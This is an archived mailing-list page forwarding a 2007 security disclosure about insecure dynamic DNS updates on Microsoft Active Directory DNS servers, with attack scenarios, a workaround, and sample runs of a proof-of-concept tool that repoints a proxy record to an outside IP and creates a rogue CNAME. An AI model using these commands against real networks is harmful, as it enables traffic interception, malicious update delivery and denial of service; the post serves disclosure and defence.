ðòïåëôù 

  áòèé÷ 

Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 

  ðåòóïîáìøîïå 

  ðòïçòáííù 

ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Exploiting Microsoft dynamic Dns updates


> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf 
> Of Andres Tarasco
> Sent: Thursday, March 22, 2007 1:35 PM
> To: full-disclosure@xxxxxxxxxxxxxxxxx; bugtraq@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Exploiting Microsoft dynamic Dns updates
> 
> Hi list,
> 
> By default, most Microsoft DNS servers integrated with active 
> directory allows
> insecure dynamic updates for dns records.
> This feature allows remote users to create, change and delete 
> DNS records.
> There are several attack scenarios: 
> 
> + MITM attacks: Changing dns records for the network proxy 
> and relay HTTP queries. 
>   This attack vector is the most reliable and also allows us 
> to exploit automatic 
>   updates for most Windows software, by deploying custom 
> binaries to the client. 
> 
>  + Denial of service: by deleting / changing critical dns records
> 
>  + Pharming: like mitm attacks, poisoning several dns records.
> 
> dnsfun exploits that weak configuration and allows remote 
> users to modify dns records. 
> Here are some examples of what can be done. Example:
> 
> 
> D:\DNSfun>ping -n 1 FakeProxy.fooooo.com
> Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes 
> de datos:
>       
> D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q  proxy.mydomain -u 66.6.66.6
> Microsoft Dynamic DNS Updates - Proof of Concept 
> http://www.514.es - (c) 2007 Andres Tarasco AcuÓa
>       
>  [+] Trying to resolve Host: proxy.mydomain (Dns Server 10.100.1.1)
>  [+] Host proxy.mydomain resolved as 192.168.1.200
>  [+] Trying to set ip address of the host proxy.mydomain to 66.6.66.6
>  [+] Trying Nonsecure Dynamic Update...
>  [?] Host Updated. Checking...(0) 
>  [+] Host proxy.mydomain resolved as 66.6.66.6
> 
> D:\DNSfun>dnsfun.exe -s 10.100.1.1 -cc atarasco.mydomain.com 
> -u www.514.es
>  Microsoft Dynamic DNS Updates - Proof of Concept
>  http://www.514.es - (c) 2007 Andres Tarasco AcuÓa
> 
> [+] Gathering Credentials.. 
> [+] Creating DNS CName Record for atarasco.mydomain.com (www.514.es)
> [+] Host Created. Rechecking Record...
> [+] Host atarasco.mydomain.com <http://atarasco.mydomain.com> 
>  resolved as CNAME www.514.es
> 
> This isn't a new vulnerability but AFAIK those attack vectors 
> were never exploited.
> Workaround: Disable dynamic updates or set your dns to only 
> accept secure updates. 
> 
> Spanish version and both src+binary are available at 
> http://www.514.es/2007/03/explotando_actualizaciones_din.html
> 
> regards,
> 
> Andres Tarasco
> 
> 
> 
>

Attachment: dnsfun.c
Description: dnsfun.c


 



Copyright © Lexa Software, 1996-2009.